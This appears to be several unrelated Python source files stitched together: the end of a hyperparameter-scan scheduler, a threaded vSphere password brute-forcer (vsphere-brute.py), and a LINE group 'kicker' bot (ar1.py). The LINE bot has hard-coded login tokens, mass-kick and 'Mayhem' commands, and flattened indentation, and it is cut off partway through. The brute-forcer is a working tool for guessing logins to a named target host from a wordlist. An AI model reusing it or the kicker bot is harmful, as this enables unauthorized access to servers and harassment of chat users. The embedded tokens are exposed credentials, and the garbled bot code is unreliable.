    '''The high-level management of the scan procedures
    onwards from preparation. Manages round_run()'''

    from tqdm import tqdm
    from .scan_prepare import scan_prepare
    self = scan_prepare(self)

    # initiate the progress bar
    self.pbar = tqdm(total=len(self.param_object.param_index),
                     disable=self.disable_progress_bar)

    # the main cycle of the experiment
    processes = []
    total = len(self.param_object.param_index)
    count = 0
    num_gpus = 0
    # Probe the GPU count with nvidia_smi; any failure (library missing,
    # no driver) leaves num_gpus at 0.
    # NOTE(review): bare except also swallows KeyboardInterrupt here.
    try:
        nvidia_smi.nvmlInit()
        num_gpus = nvidia_smi.nvmlDeviceGetCount()
        nvidia_smi.nvmlShutdown()
    except:
        pass
    # gpu_tickets[i] counts live worker processes currently assigned GPU i.
    gpu_tickets = [0] * num_gpus
    while True:
        if self.use_multiprocessing:
            # Throttle: block until at least one worker slot frees up.
            while len(processes) >= self.max_processes:
                done = multiprocessing.connection.wait([x.sentinel for x in processes])
                for p in filter(lambda x: x.sentinel in done, processes):
                    gpu_id = -1
                    try:
                        gpu_id = getattr(p, 'gpu_id')
                    except:
                        pass
                    # Return the finished worker's GPU ticket, if it had one.
                    if gpu_id != -1:
                        gpu_tickets[gpu_id] -= 1
                    processes.remove(p)
                    count += 1
                    print(f"completed {count} of {total} runs ({(100.0 * count) / total : 0.2f}%)")
                    self.pbar.update(1)

        # get the parameters
        self.round_params = self.param_object.round_parameters()

        # break when there is no more permutations left
        if self.round_params is False:
            break

        # otherwise proceed with next permutation
        from .scan_round import scan_round

        if self.use_multiprocessing:
            # allocate a GPU
            gpu_id = 0
            try:
                # reuse GPUs: pick the one with the fewest live workers
                gpu_id = gpu_tickets.index(min(gpu_tickets))
                gpu_tickets[gpu_id] += 1
            except:
                # no GPU available (gpu_tickets is empty -> min() raises)
                gpu_id = -1
                pass
            p = Process(target=scan_round, args=(self,))
            self.round_params['GPU_ID'] = gpu_id
            # Tag the process so the reaping loops above/below can return
            # its GPU ticket.
            setattr(p, 'gpu_id', gpu_id)
            processes.append(p)
            p.start()
        else:
            self = scan_round(self)
            self.pbar.update(1)

    if self.use_multiprocessing:
        # Drain the remaining workers after the parameter space is exhausted.
        while len(processes) > 0:
            done = multiprocessing.connection.wait([x.sentinel for x in processes])
            for p in filter(lambda x: x.sentinel in done, processes):
                gpu_id = -1
                try:
                    gpu_id = getattr(p, 'gpu_id')
                except:
                    pass
                processes.remove(p)
                if gpu_id != -1:
                    gpu_tickets[gpu_id] -= 1
                count += 1
                print(f"completed {count} of {total} runs ({(100.0 * count) / total : 0.2f}%)")
                self.pbar.update(1)

    # close progress bar before finishing
    self.pbar.close()

    # finish
    from ..logging.logging_finish import logging_finish
    self = logging_finish(self)

    from .scan_finish import scan_finish
    self = scan_finish(self)
|
vsphere-brute.py | import optparse
import time
from threading import *
from pysphere import VIServer, VIProperty, MORTypes, VIApiException
from pysphere.resources import VimService_services as VI
from pysphere.vi_task import VITask
import sys
# Cap on simultaneous password attempts; the semaphore throttles thread spawn.
maxConnections = 10
connection_lock = BoundedSemaphore(value=maxConnections)
# Shared flags mutated by worker threads: Found stops the main loop once a
# password works; Fails counts socket timeouts (no lock; best-effort state).
Found = False
Fails = 0
# Supporting Functions
def setupConnection(host, user, password, release):
    """Attempt one vSphere login; on success print the password and set Found.

    NOTE(review): both retry paths call ``connect(...)``, which is not
    defined anywhere in this file -- presumably it should be
    ``setupConnection(...)``; confirm before relying on the retry logic.
    """
    global Found
    global Fails
    try:
        server = VIServer()
        server.connect(host, user, password)
        print "[+] Password Found: " +password
        print "[+] Host: " + host + " Version: " + server.get_server_type() + " " + server.get_api_version() + "\n"
        closeConnection(server)
        Found = True
    except Exception, err:
        # Error-message sniffing distinguishes timeouts from prompt races.
        if 'read_nonblocking' in str(err):
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(err):
            time.sleep(1)
            connect(host, user, password, False)
        # else:
        # print "error message: " + str(err)
    finally:
        # Release the semaphore slot so main() can spawn the next attempt.
        if release: connection_lock.release()
def closeConnection(server):
    """Cleanly disconnect an open VIServer session; always returns None."""
    server.disconnect()
    return None
def main():
    """Parse CLI options and brute-force vSphere logins from a wordlist.

    Spawns one thread per password attempt, bounded by connection_lock;
    stops when a worker sets Found or after too many socket timeouts.
    """
    parser = optparse.OptionParser('usage %prog '+ '-H <target host> -u <user> -F <password list>'
                                   )
    parser.add_option('-H', dest='tgtHost', type='string',help='specify target host')
    parser.add_option('-F', dest='passwdFile', type='string',\
                      help='specify password file')
    parser.add_option('-u', dest='user', type='string',\
                      help='specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passwdFile = options.passwdFile
    user = options.user
    if host == None or passwdFile == None or user == None:
        print parser.usage
        exit(0)
    fn = open(passwdFile, 'r')
    for line in fn.readlines():
        # Found / Fails are set by the worker threads started below.
        if Found:
            print "[*] Exiting: Password Found"
            exit(0)
        if Fails > 5:
            print "[!] Exiting: Too Many Socket Timeouts"
            exit(0)
        connection_lock.acquire()
        password = line.strip('\r').strip('\n')
        print "[-] Testing: "+str(password)
        t = Thread(target=setupConnection, args=(host, user,password, True))
        # NOTE(review): Thread.start() returns None, so ``child`` is unused.
        child = t.start()

if __name__ == '__main__':
    main()
|
ar1.py | # -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob,re
#(qr=True)
# NOTE(review): the LINE auth tokens below are hard-coded credentials checked
# into source -- they should be rotated and loaded from configuration/env.
cl = LINETCR.LINE()
#cl.login(qr=True)
cl.login(token="Enb2crNrFWoERzVn9oVc.b0v8ubUr/rhlN/vtCN3hJa.hGDAlZYQITl7Tsj1ijqDETJAYyoO00tI+MA08eNhTSE=")
cl.loginResult()
ki = LINETCR.LINE()
#ki.login(qr=True)
ki.login(token="EnzLXY3ISqkzq2eVEL69.1g5mFX8xOBfJmY505CbPgq.KM7/hdu2VgE1NZmKv4UlXvpPJ7odTr9RVOB8XcuE7JU=")
ki.loginResult()
ki2 = LINETCR.LINE()
#ki2.login(qr=True)
ki2.login(token="EnMunPJLIjFEWNutmX04.09bUyz/9ZLejQ8dwDN41Pa.2mFEKquMtQhr3ilrP2g+s8VBa2TKlapAzBBFMQQRbZk=")
ki2.loginResult()
ki3 = LINETCR.LINE()
#ki3.login(qr=True)
ki3.login(token="EnX81LUPnDGvVoOUmO5b.5DsNL0uLM2+GNx3rLmG/cW.ugEMUZslok2IDWYIODq0QAttgx0JsKGI5kox6uUVlE0=")
ki3.loginResult()
ki4 = LINETCR.LINE()
#ki4.login(qr=True)
ki4.login(token="EnGD7RmckF85dv3Z0B63.gGzzZGATpehWNYFKkyWdeW.RHkJgx19A2/ieqvn1CuWhBQikKN3v5G3qHnW8JUln0U=")
ki4.loginResult()
ki5 = LINETCR.LINE()
#ki5.login(qr=True)
ki5.login(token="EnKhmeJ3uL9qA42d9KF9.ryCu/Bfown4WpN2W5m6Kgq.RgsVZlYT5Olg2RMJO0PhxvVMQSRJUYT8PPekMBRD8YA=")
ki5.loginResult()
print "Iphenk login success"
# Python 2 trick to make UTF-8 the default encoding for the emoji-heavy
# menus below.
reload(sys)
sys.setdefaultencoding('utf-8')
# Help menu shown to users; the box-drawing / emoji layout is intentional
# and must be preserved byte-for-byte.
helpMessage ="""
╔═══════════════════
╠ ✍FAF TEAM BOT✍️
╠❂͜͡➣[Bot]
╠❂͜͡➣[Group id]
╠❂͜͡➣[Ginfo]
╠❂͜͡➣[Mid all]
╠❂͜͡➣[Respon]
╠❂͜͡➣[Speed]
╠❂͜͡➣[Banlist]
╠❂͜͡➣[Gn G.Name]
╠❂͜͡➣[Cancel]
╠❂͜͡➣[Tagall]
╠❂͜͡➣[View]
╠❂͜͡➣[Open]
╠❂͜͡➣[Close]
╠❂͜͡➣[Set]
╠❂͜͡➣[Name: 'text']
╠❂͜͡➣[All: 'text']
╠❂͜͡➣[Setp] [cek]
╠❂͜͡➣[Bc: 'text']
╠❂͜͡➣[FAF out]
╠❂͜͡➣[LG]
╠❂͜͡➣[LG2]
╠❂͜͡➣[Mid @]
╠❂͜͡➣[Bot Like]
╠❂͜͡➣[Like]
╠❂͜͡➣[Check:]
╠❂͜͡➣[Allbio:]
╠❂͜͡➣[Copy]
╠❂͜͡➣[All clone @]
╠❂͜͡➣[Backup]
╚═══════════════════
╔═══════════════════
╠ ✍ KICKER COMMAND ✍️
╠
╠❂͜͡➣[Banned @]
╠❂͜͡➣[Unban @]
╠❂͜͡➣[Kill @]
╠❂͜͡➣[Nk @]
╠❂͜͡➣[Vk @]
╠❂͜͡➣[All]
╠❂͜͡➣[Mayhem]
╠❂͜͡➣[Clear ban]
╠❂͜͡➣[Bom]
╚═══════════════════
"""
# Protection-settings menu text; formatting preserved byte-for-byte.
Setgroup ="""
╔═══════════════════
╠ ✍ PROTECT ✍️
╠❂͜͡➣[AllProtection]~[Fras on - off]
╠❂͜͡➣[Protect QR]~[Qr on - off]
╠❂͜͡➣[Mid Check]~[Contact On - Off]
╠❂͜͡➣[Reject Invite]~[Bi on - off]
╠❂͜͡➣[Protect Cancel]~[Cn on - off]
╠❂͜͡➣[Member Protect]~[M on - off]
╚═══════════════════
"""
# Pool of all logged-in client accounts; kick/update actions pick one at
# random to spread API usage.
KAC=[cl,ki,ki2,ki3,ki4,ki5]
# Cached mids (LINE user ids) of each bot account.
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = ki2.getProfile().mid
Cmid = ki3.getProfile().mid
Dmid = ki4.getProfile().mid
Emid = ki5.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,"u07457c501b91f911cb9fe553727dc78c"]
admin = ["u07457c501b91f911cb9fe553727dc78c"]
staff = ["u07457c501b91f911cb9fe553727dc78c"]
adminMID = "u07457c501b91f911cb9fe553727dc78c"
# Global mutable feature-flag/state dictionary read and written by the
# operation handlers.
wait = {
    'contact':True,
    'autoJoin':True,
    'autoCancel':{"on":True,"members":1},
    'leaveRoom':True,
    'timeline':True,
    'autoAdd':True,
    'message':"Thanks for add me",
    "lang":"JP",
    "comment":"Thanks for add me",
    "commentOn":False,
    "commentBlack":{},
    "wblack":False,
    "dblack":False,
    "clock":False,
    "cName":"IP ディータ",
    "cName2":"ディータ1つ " ,
    "cName3":"ディータ二人 ",
    "cName4":"ディータ三 ",
    "cName5":"ディータ4人 ",
    "cName6":"ディータ五 ",
    "cName7":"ディータ6 ",
    "cName8":"ディータ7人 ",
    "cName9":"ディータ8人 ",
    "cName10":"ディータ9人 ",
    "cName11":"ディータ10人 ",
    "blacklist":{},
    "wblacklist":False,
    "dblacklist":True,
    "Protectgr":{},
    "Protectguest":{},
    "Protectcancel":{},
    "protectionOn":{},
    "atjointicket":True,
    "MProtection":{},
    "AllProtection":{},
}
# Read-receipt tracking state keyed by chat id.
wait2 = {
    'readPoint':{},
    'readMember':{},
    'setTime':{},
    'ROM':{}
}
# NOTE(review): setTime is (re)bound four times; only the final alias to
# wait2["setTime"] survives.
setTime = {}
setTime = wait2['setTime']
blacklistFile='blacklist.txt'
pendinglistFile='pendinglist.txt'
setTime = {}
setTime = wait2["setTime"]
# Snapshot of the primary account's profile used by backup/restore commands.
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
def sendMessage(to, text, contentMetadata={}, contentType=0):
    """Build a LINE Message object and bump the per-recipient counter.

    NOTE(review): ``profile`` and ``messageReq`` are not defined anywhere
    in this file, and the constructed ``mes`` is never actually sent --
    this function looks incomplete or dead. Also, the mutable default
    ``contentMetadata={}`` is shared across calls.
    """
    mes = Message()
    mes.to, mes.from_ = to, profile.mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
def NOTIFIED_READ_MESSAGE(op):
    """Record which members have read messages in a watched chat.

    Appends the reader's display name to wait2['readMember'][chat] and
    stores it in wait2['ROM'][chat][reader] the first time it is seen.
    NOTE(review): the bare ``except: pass`` hides every error, including
    missing keys when the chat was never registered as a read point.
    """
    try:
        if op.param1 in wait2['readPoint']:
            Name = cl.getContact(op.param2).displayName
            if Name in wait2['readMember'][op.param1]:
                pass
            else:
                wait2['readMember'][op.param1] += "\n・" + Name
                wait2['ROM'][op.param1][op.param2] = "・" + Name
        else:
            pass
    except:
        pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
#-------Protect Qr-------#
if op.type == 11:
if wait["Protectgr"] == True:
if op.param2 not in Bots:
G = random.choice(KAC).getGroup(op.param1)
G.preventJoinByTicket = True
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
random.choice(KAC).updateGroup(G)
random.choice(KAC).sendText(op.param1,random.choice(KAC).getContact(op.param2).displayName + "Jangan Buka Kode QR Njiiir")
#------Finish------#
# -INV KICK- #
if op.type == 13:
if wait["Protectguest"] == True:
if op.param2 in Bots or staff:
pass
else:
random.choice(KAC).cancelGroupInvitation(op.param1,[op.param3])
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
#--CANCEL KICK--#
if op.type == 32:
if wait["Protectcancel"] == True:
if op.param2 not in Bots or staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
#------FINISH------#
if op.type == 15:
random.choice(KAC).sendText(op.param1, cl.getContact(op.param2).displayName + " Good Bye\n(*´・ω・*)")
print op.param3 + "has left the group"
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = Amid.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
cl.updateGroup(G)
Ticket = cl.reissueGroupTicket(op.param1)
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki2.getGroup(op.param1)
X.preventJoinByTicket = False
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki.updateGroup(X)
Ti = ki.reissueGroupTicket(op.param1)
if op.param3 in Bmid:
if op.param2 in Cmid:
X = ki3.getGroup(op.param1)
X.preventJoinByTicket = False
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki2.updateGroup(X)
Ti = ki2.reissueGroupTicket(op.param1)
if op.param3 in Cmid:
if op.param2 in Dmid:
X = ki4.getGroup(op.param1)
X.preventJoinByTicket = False
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki3.updateGroup(X)
Ti = ki3.reissueGroupTicket(op.param1)
if op.param3 in Dmid:
if op.param2 in Emid:
X = ki5.getGroup(op.param1)
X.preventJoinByTicket = False
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki4.updateGroup(X)
Ti = ki4.reissueGroupTicket(op.param1)
if op.param3 in Emid:
if op.param2 in mid:
X = cl.getGroup(op.param1)
X.preventJoinByTicket = False
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
ki5.updateGroup(X)
Ti = ki5.reissueGroupTicket(op.param1)
if op.type == 13:
print op.param1
print op.param2
print op.param3
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 19:
if mid in op.param3:
if op.param2 in Bots:
pass
try:
ki.kickoutFromGroup(op.param1,[op.param2])
ki.inviteIntoGroup(op.param1,[op.param3])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("client Kick regulation or Because it does not exist in the group、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
G = ki.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ti = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
X = cl.getGroup(op.param1)
X.preventJoinByTicket = True
cl.updateGroup(X)
Ti = cl.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Amid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki.getGroup(op.param1)
G.preventJoinByTicket = True
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Bmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Cmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki3.getGroup(op.param1)
G.preventJoinByTicket = True
ki3.updateGroup(G)
Ticket = ki3.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Dmid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki4.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki4.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if Emid in op.param3:
if op.param2 in Bots:
pass
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
try:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
except:
print ("clientが蹴り規制orグループに存在しない為、\n["+op.param1+"]\nの\n["+op.param2+"]\nを蹴る事ができませんでした。\nブラックリストに追加します。")
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
X = random.choice(KAC).getGroup(op.param1)
X.preventJoinByTicket = False
random.choice(KAC).updateGroup(X)
Ti = random.choice(KAC).reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ti)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
ki2.acceptGroupInvitationByTicket(op.param1,Ti)
ki3.acceptGroupInvitationByTicket(op.param1,Ti)
ki4.acceptGroupInvitationByTicket(op.param1,Ti)
ki5.acceptGroupInvitationByTicket(op.param1,Ti)
G = ki5.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in Bots:
wait["blacklist"][op.param2] = True
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 not in Bots and staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin: #Kalo Admin ke Kick
if op.param2 in Bots:
pass
if op.param2 in staff:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == profile.mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
ki.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
ki.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
ki.sendText(msg.to,"already")
#ki.sendText(msg.to,"already")
#kk.sendText(msg.to,"already")
#kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
ki.sendText(msg.to,"aded")
#ki.sendText(msg.to,"aded")
#kk.sendText(msg.to,"aded")
#kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
#wait["dblacklist"] = False
else:
wait["dblacklist"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Set"]:
if msg.from_ in Bots or staff:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.toType == 2:
